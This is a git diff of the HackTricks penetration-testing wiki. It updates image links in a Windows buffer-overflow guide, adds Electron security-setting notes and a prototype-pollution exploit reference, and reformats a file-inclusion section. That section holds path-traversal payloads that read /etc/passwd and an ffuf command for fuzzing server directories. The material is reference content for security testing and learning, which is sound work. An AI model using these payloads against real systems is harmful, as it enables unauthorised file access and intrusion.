diff --git a/.gitbook/assets/image (34) (1).png b/.gitbook/assets/image (34) (1).png
new file mode 100644
index 00000000..9a275baa
Binary files /dev/null and b/.gitbook/assets/image (34) (1).png differ
diff --git a/.gitbook/assets/image (34).png b/.gitbook/assets/image (34).png
index 9a275baa..2a984795 100644
Binary files a/.gitbook/assets/image (34).png and b/.gitbook/assets/image (34).png differ
diff --git a/.gitbook/assets/image (35) (1).png b/.gitbook/assets/image (35) (1).png
new file mode 100644
index 00000000..84735e38
Binary files /dev/null and b/.gitbook/assets/image (35) (1).png differ
diff --git a/.gitbook/assets/image (35).png b/.gitbook/assets/image (35).png
index 84735e38..2758b36d 100644
Binary files a/.gitbook/assets/image (35).png and b/.gitbook/assets/image (35).png differ
diff --git a/.gitbook/assets/image (36) (1).png b/.gitbook/assets/image (36) (1).png
new file mode 100644
index 00000000..ceb0a0f9
Binary files /dev/null and b/.gitbook/assets/image (36) (1).png differ
diff --git a/.gitbook/assets/image (36).png b/.gitbook/assets/image (36).png
index ceb0a0f9..625f447e 100644
Binary files a/.gitbook/assets/image (36).png and b/.gitbook/assets/image (36).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
index 625f447e..63d09319 100644
Binary files a/.gitbook/assets/image.png and b/.gitbook/assets/image.png differ
diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
index 160a44b9..fb24d0eb 100644
--- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
+++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md
@@ -164,7 +164,7 @@ In this case you can see that **you shouldn't use the char 0x0A** (nothing is sa
 
 In this case you can see that **the char 0x0D is avoided**:
 
-![](<../.gitbook/assets/image (34).png>)
+![](<../.gitbook/assets/image (34) (1).png>)
 
 ## Find a JMP ESP as a return address
 
@@ -182,7 +182,7 @@ You will **list the memory maps**. Search for some DLl that has:
 * **NXCompat: False**
 * **OS Dll: True**
 
-![](<../.gitbook/assets/image (35).png>)
+![](<../.gitbook/assets/image (35) (1).png>)
 
 Now, inside this memory you should find some JMP ESP bytes, to do that execute:
 
@@ -193,7 +193,7 @@ Now, inside this memory you should find some JMP ESP bytes, to do that execute:
 
 **Then, if some address is found, choose one that don't contain any badchar:**
 
-![](<../.gitbook/assets/image (36).png>)
+![](<../.gitbook/assets/image (36) (1).png>)
 
 **In this case, for example: \_0x5f4a358f**\_
 
diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md
index bdac3d06..c1167a58 100644
--- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md
+++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md
@@ -57,6 +57,10 @@ The desktop application might have access to the user’s device through Node AP
 * **`contextIsolation`** - is `on` by default. If on, main and renderer processes aren't isolated.
 * **`preload`** - empty by default.
 * [**`sandbox`**](https://docs.w3cub.com/electron/api/sandbox-option) - is off by default. It will restrict the actions NodeJS can perform.
+* Node Integration in Workers
+* **`nodeIntegrationInSubframes`**- is `off` by default.
+  * If **`nodeIntregation`** is **enabled**, this would allow the use of **Node.js APIs** in web pages that are **loaded in iframes** within an Electron application.
+  * If **`nodeIntregation`** is **disabled**, then preloads will load in the iframe
 
 Example of configuration:
 
@@ -75,7 +79,9 @@ const mainWindowOptions = {
   webPreferences: {
     blinkFeatures: 'EnumerateDevices,AudioOutputDevices',
     nodeIntegration: false,
-    contextIsolation: false
+    contextIsolation: false,
+    sandbox: false,
+    nodeIntegrationInSubFrames: false,
     preload: _path2.default.join(__dirname, 'mainScreenPreload.js'),
     nativeWindowOpen: true,
     enableRemoteModule: false,
@@ -118,6 +124,8 @@ If the **nodeIntegration** is set to **on**, a web page's JavaScript can use Nod
 </script>
 ```
 
+<figure><img src="../../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
+
 ## RCE: preload
 
 The script indicated in this setting is l**oaded before other scripts in the renderer**, so it has **unlimited access to Node APIs**:
@@ -263,7 +271,7 @@ webContents.on("new-window", function (event, url, disposition, options) {} // o
 webContents.on("will-navigate", function (event, url) {}                    // opens the custom openInternally function (it is declared below)
 ```
 
-The call to \*\* `openInternally`\*\* will decide if the **link** will be **opened** in the **desktop window** as it's a link belonging to the platform, **or** if will be opened in the **browser as a 3rd party resource**.
+The call to  **`openInternally`** will decide if the **link** will be **opened** in the **desktop window** as it's a link belonging to the platform, **or** if will be opened in the **browser as a 3rd party resource**.
 
 In the case the **regex** used by the function is **vulnerable to bypasses** (for example by **not escaping the dots of subdomains**) an attacker could abuse the XSS to **open a new window which** will be located in the attackers infrastructure **asking for credentials** to the user:
 
@@ -317,6 +325,7 @@ npm start
 * [https://www.youtube.com/watch?v=a-YnG3Mx-Tg](https://www.youtube.com/watch?v=a-YnG3Mx-Tg)
 * [https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s](https://www.youtube.com/watch?v=xILfQGkLXQo\&t=22s)
 * More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
+* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
 
 <details>
 
diff --git a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
index ef4123f8..6cad6731 100644
--- a/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
+++ b/network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md
@@ -4,15 +4,11 @@
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
 
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
 
@@ -62,18 +58,26 @@ location.reload();//Trigger the "exit" event
 </script>
 ```
 
+## Example 2
+
+Get **require object from prototype pollution**. From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
+
+Leak:
+
+<figure><img src="../../../.gitbook/assets/image (34).png" alt=""><figcaption></figcaption></figure>
+
+Exploit:
+
+<figure><img src="../../../.gitbook/assets/image (35).png" alt=""><figcaption></figcaption></figure>
+
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
 
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
diff --git a/pentesting-web/file-inclusion/README.md b/pentesting-web/file-inclusion/README.md
index 46faed34..92e5f934 100644
--- a/pentesting-web/file-inclusion/README.md
+++ b/pentesting-web/file-inclusion/README.md
@@ -12,7 +12,7 @@
 
 </details>
 
-<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (36).png" alt=""><figcaption></figcaption></figure>
 
 Did you know that crypto projects pay more bounty rewards than their web2 counterparts?\
 This [**crypto bounty alone**](https://hackenproof.com/jungle/jungle-smart-contract) is worth $1.000.000!\
@@ -112,31 +112,38 @@ http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd
 ### Identifying folders on a server
 
 Depending on the applicative code / allowed characters, it might be possible to recursively explore the file system by discovering folders and not just files. In order to do so:
-- identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux):
+
+* identify the "depth" of you current directory by succesfully retrieving `/etc/passwd` (if on Linux):
+
 ```
 http://example.com/index.php?page=../../../etc/passwd # depth of 3
-````
-- try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`:
+```
+
+* try and guess the name of a folder in the current directory by adding the folder name (here, `private`), and then going back to `/etc/passwd`:
+
 ```
 http://example.com/index.php?page=private/../../../../etc/passwd # we went deeper down one level, so we have to go 3+1=4 levels up to go back to /etc/passwd 
 ```
-- if the application is vulnerable, there might be two different outcomes to the request:
-  - if you get an error / no output, the `private` folder does not exist at this location
-  - if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory 
 
-- the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively.
+* if the application is vulnerable, there might be two different outcomes to the request:
+  * if you get an error / no output, the `private` folder does not exist at this location
+  * if you get the content from `/etc/passwd`, you validated that there is indeed a `private`folder in your current directory
+* the folder(s) you discovered using this techniques can then be fuzzed for files (using a classic LFI method) or for subdirectories using the same technique recursively.
 
 It is possible to adapt this technique to find directories at any location in the file system. For instance, if, under the same hypothesis (current directory at depth 3 of the file system) you want to check if `/var/www/` contains a `private` directory, use the following payload:
+
 ```
 http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd
 ```
 
 The following sequence of commands allows the generation of payloads using `sed` (1) as input for url fuzzing tools such as `ffuf` (2):
+
 ```
 $ sed 's_^_../../../var/www/_g' /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt | sed 's_$_/../../../etc/passwd_g' > payloads.txt
 $ ffuf -u http://example.com/index.php?page=FUZZ -w payloads.txt -mr "root"
 ```
-Of course, adapt there payloads to your needs in terms of depth / location / input directory list. 
+
+Of course, adapt there payloads to your needs in terms of depth / location / input directory list.
 
 ### **Path truncation**